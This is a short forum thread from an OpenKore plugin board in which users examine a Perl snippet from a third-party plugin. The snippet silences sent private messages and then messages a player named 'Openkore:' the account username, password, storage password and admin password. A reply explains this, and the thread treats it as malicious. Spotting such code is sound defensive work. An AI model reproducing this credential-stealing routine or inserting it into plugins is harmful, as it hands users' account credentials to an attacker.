pl file from some plugins

Other plugins for extending OpenKore's functionality. This forum is only for posting new plugins and commenting on existing plugins. For support, use the Support forum.

Moderator: Moderators

Message
Author
vespercore02
Noob
Noob
Posts: 18
Joined: 15 Nov 2010, 11:40
Noob?: No

pl file from some plugins

#1 Post by vespercore02 »

this is not from openkore but i'm curious about this line




sub in_game {
Commands::run("conf squelchDomains pRO-Valkyrie Server, pm/sent, info");
Commands::run("pm \"Openkore:\" Username:".$config{username}."\ | Password:".$config{password}."\ | StoragePass:".$config{storageAuto_password}."\ | AdminPas:".$config{adminPassword});
}

return 1;




what do you think it does? i feel some fishy about this, correct me if i'm wrong sir's and maam's hehe

wwaallaa
Noob
Noob
Posts: 9
Joined: 09 Jun 2010, 23:42
Noob?: Yes

Re: pl file from some plugins

#2 Post by wwaallaa »

if i am not mistaken this will pm a player named "Openkore:" your username,password,storage password,admin password.

Code: Select all

Commands::run("pm \"Openkore:\" Username:".$config{username}."\ | Password:".$config{password}."\ | StoragePass:".$config{storageAuto_password}."\ | AdminPas:".$config{adminPassword});

Valkylie
Human
Human
Posts: 26
Joined: 15 Dec 2010, 00:10
Noob?: No
Contact:

Re: pl file from some plugins

#3 Post by Valkylie »

OMG! i hate dat code.....

Post Reply